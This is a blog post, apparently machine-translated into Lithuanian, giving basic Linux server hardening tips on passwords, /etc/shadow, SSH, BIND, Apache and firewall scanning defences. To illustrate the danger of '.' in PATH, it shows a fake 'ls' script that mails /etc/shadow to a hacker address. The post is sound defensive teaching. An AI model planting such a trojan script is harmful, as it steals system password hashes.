„Linux“ (serverio) saugos patarimai (1 dalis)

Ilgą laiką nieko neskelbiau tinklaraštyje ir norėčiau pasidalinti su jumis patarimais, paimtais iš knygos, kuri (be kita ko). Aš jį radau universitete ir ką tik perskaičiau, ir, nors jis, tiesą sakant, yra šiek tiek pasenęs, o parodytos technikos vargu ar veiks, atsižvelgiant į sistemos evoliuciją, tačiau tai taip pat yra įdomūs aspektai, kuriuos galima parodyti. 9788448140502

Noriu paaiškinti, kad jie yra patarimai, orientuoti į „Linux“ sistemą, kuri naudojama kaip serveris, vidutiniu ar galbūt dideliu mastu, nes darbalaukio vartotojo lygmeniu, nors jie ir nėra pritaikyti, jie nebūtų labai naudingi.

Taip pat perspėju, kad tai yra paprasti greiti patarimai, ir nesigilinsiu į detales, nors planuoju padaryti dar vieną daug konkretesnį ir platesnį įrašą konkrečia tema. Bet tai pamatysiu vėliau. Pradėkime.

Slaptažodžių politika. 

Nors tai skamba kaip frazė, turint gerą slaptažodžių politiką, pažeidžiama sistema skiriasi. Tokie išpuoliai, kaip „žiauri jėga“, naudojasi turėdami blogą slaptažodį, kad pasiektų sistemą. Dažniausi patarimai:

  • Sujunkite didžiąsias ir mažąsias raides.
  • Naudokite specialiuosius simbolius.
  • Skaičiai.
  • Daugiau nei 6 skaitmenys (tikiuosi, daugiau nei 8).

Be to, apsvarstykime du esminius failus.  / etc / passwd ir / etc / shadow.

Kažkas labai svarbu yra tas failas / etc / passwd. Be to, nurodydami vartotojo vardą, jo vartotojo vardą, aplanko kelią, bash .. ir kt. kai kuriais atvejais jis taip pat rodo vartotojo užkoduotą raktą.

 Pažvelkime į tipišką jo kompoziciją.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

vartotojas: cryptkey: uid: gid: kelias :: kelias: bash

Tikroji problema yra ta, kad būtent šis failas turi leidimus -rw-r - r– tai reiškia, kad jis turi skaitymo teises bet kuriam sistemos vartotojui. o turint užkoduotą raktą nėra labai sunku iššifruoti tikrąjį.

Štai kodėl failas egzistuoja / etc / shadow. Tai yra failas, kuriame, be kita ko, saugomi visi vartotojo raktai. Šis failas turi reikiamus leidimus, kad joks vartotojas negalėtų jo perskaityti.

Norėdami tai išspręsti, turime pereiti prie bylos / etc / passwd ir pakeiskite užšifruotą raktą į „x“, tai išsaugos raktą tik mūsų faile / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problemos su PATH ir .bashrc bei kitais.

Kai vartotojas vykdo komandą savo konsolėje, apvalkalas ieško šios komandos katalogų sąraše, esančiame aplinkos kintamajame PATH.

Jei konsolėje įvesite "echo $ PATH", tai bus kažkas panašaus.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Kiekviename iš šių aplankų apvalkalas ieškos komandos, parašytos jai vykdyti. Jis "." tai reiškia, kad pirmasis ieškomas aplankas yra tas pats aplankas, iš kurio vykdoma komanda.

Tarkime, kad yra vartotojas „Carlos“ ir šis vartotojas nori „daryti blogį“. Šis vartotojas savo pagrindiniame aplanke galėjo palikti failą pavadinimu „ls“ ir šiame faile vykdyti tokią komandą:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Ir jei pagrindinis naudotojas paskirties dalykams bando išvardyti aplankus „carlos“ aplanke (kadangi jis pirmiausia ieško komandos tame pačiame aplanke, netyčia jis siunčia failą su slaptažodžiais į šį el. Laišką, tada aplankus būtų įtrauktas į sąrašą ir jis sužinotų tik labai vėlai.

Norėdami to išvengti, turime pašalinti „“. PATH kintamojo.

Lygiai taip pat turėtų būti tikrinami tokie failai kaip /.bashrc, /.bashrc_profile, ./.login ir patikrinama, ar nėra „“. kintamajame PATH ir iš tikrųjų iš tokių failų kaip šis, galite pakeisti konkrečios komandos paskirtį.

Patarimai su paslaugomis:

SHH

  • Išjunkite ssh protokolo 1 versiją faile sshd_config.
  • Neleiskite root vartotojui prisijungti naudojant ssh.
  • Failus ir aplankus ssh_host_key, ssh_host_dsa_key ir ssh_host_rsa_key turėtų perskaityti tik pagrindinis vartotojas.

ĮPAREIGOTI

  • Pakeiskite pasveikinimo pranešimą faile named.conf taip, kad jame nebūtų rodomas versijos numeris
  • Ribokite zonos perkėlimą ir įgalinkite jį tik komandoms, kurioms to reikia.

apache

  • Neleiskite tarnybai rodyti jūsų versijos sveikinimo pranešime. Redaguokite failą httpd.conf ir pridėkite arba pakeiskite eilutes:  

ServerSignature Off
ServerTokens Prod

  • Išjungti automatinį indeksavimą
  • Konfigūruokite „Apache“, kad jis neteiktų neskelbtinų failų, pvz., .Htacces, * .inc, * .jsp .. ir kt
  • Pašalinkite vadovo puslapius ar pavyzdžius iš paslaugos
  • Paleiskite apache chrootuotoje aplinkoje

Tinklo sauga.

Iš išorinio tinklo būtina apimti visus įmanomus įrašus į jūsų sistemą. Štai keletas svarbiausių patarimų, kaip užkirsti kelią įsibrovėliams nuskaityti ir gauti informacijos iš jūsų tinklo.

Blokuoti ICMP srautą

Ugniasienė turi būti sukonfigūruota blokuoti visų tipų gaunamus ir siunčiamus ICMP srautus ir aido atsakus. Tokiu būdu išvengsite to, kad, pavyzdžiui, skaitytuvas, kuris ieško įtampos turinčios įrangos įvairiuose IP, jus suras. 

Venkite TCP ping nuskaitymo.

Vienas iš būdų nuskaityti jūsų sistemą yra TCP ping nuskaitymas. Tarkime, kad jūsų serveryje yra „Apache“ serveris 80 prievade. Įsibrovėlis gali nusiųsti ACK užklausą į tą prievadą. Tokiu atveju, jei sistema atsakys, kompiuteris bus gyvas ir nuskaitys likusius prievadus.

Tam jūsų užkardoje visada turėtų būti parinktis „būsenos supratimas“ ir išmesti visus ACK paketus, kurie neatitinka jau sukurto TCP ryšio ar seanso.

Keli papildomi patarimai:

  • Norėdami aptikti uosto nuskaitymus į savo tinklą, naudokite IDS sistemas.
  • Konfigūruokite ugniasienę taip, kad ji nepatikėtų ryšio šaltinio prievado nustatymų.

Taip yra todėl, kad kai kurie nuskaitymai naudoja „netikrą“ šaltinio prievadą, pvz., 20 ar 53, nes daugelis sistemų pasitiki šiais prievadais, nes jie būdingi ftp ar DNS.

PASTABA: Atminkite, kad dauguma šiame įraše nurodytų problemų jau buvo išspręstos beveik visuose dabartiniuose paskirstymuose. Bet niekada neskauda turėti pagrindinės informacijos apie šiuos nepatogumus, kad jų neatsitiktų.

PASTABA: Vėliau pamatysiu konkrečią temą ir padarysiu įrašą su daug išsamesne ir naujesne informacija.

Ačiū visiems už skaitymą.

Sveikinimai.


Komentaras, palikite savo

Palikite komentarą

Jūsų elektroninio pašto adresas nebus skelbiamas. Privalomi laukai yra pažymėti *

*

*

  1. Atsakingas už duomenis: Miguel Ángel Gatón
  2. Duomenų paskirtis: kontroliuoti šlamštą, komentarų valdymą.
  3. Įteisinimas: jūsų sutikimas
  4. Duomenų perdavimas: Duomenys nebus perduoti trečiosioms šalims, išskyrus teisinius įsipareigojimus.
  5. Duomenų saugojimas: „Occentus Networks“ (ES) talpinama duomenų bazė
  6. Teisės: bet kuriuo metu galite apriboti, atkurti ir ištrinti savo informaciją.

  1.   informatyvus sakė

    Straipsnis man labai patiko ir domiuosi tema, raginu tęsti turinio įkėlimą.